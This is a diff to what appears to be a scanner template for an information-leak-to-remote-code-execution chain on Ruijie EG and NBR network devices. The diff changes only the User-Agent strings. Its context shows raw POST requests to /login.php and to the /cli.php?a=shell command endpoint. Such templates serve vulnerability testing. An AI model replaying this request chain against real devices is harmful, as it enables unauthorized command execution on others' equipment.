--- a/webdev/锐捷/ruijie-eg-and-nbr-login-php-infoleak-to-rce.yaml
+++ b/webdev/锐捷/ruijie-eg-and-nbr-login-php-infoleak-to-rce.yaml
@@ -17,7 +17,7 @@ http:
       - |
         POST /login.php HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0
+        User-Agent: Moziilla/5.0
         Content-Type: application/x-www-form-urlencoded
         X-Requested-With: XMLHttpRequest
 
@@ -27,7 +27,7 @@ http:
         POST /login.php HTTP/1.1
         Host: {{Hostname}}
         X-Requested-With: XMLHttpRequest
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
+        User-Agent: Moziilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
         Content-Type: application/x-www-form-urlencoded
         Cookie: LOCAL_LANG_COOKIE=zh
         Connection: close
@@ -37,7 +37,7 @@ http:
       - |
         POST /cli.php?a=shell HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0
+        User-Agent: Moziilla/5.0
         Content-Type: application/x-www-form-urlencoded
         X-Requested-With: XMLHttpRequest
 
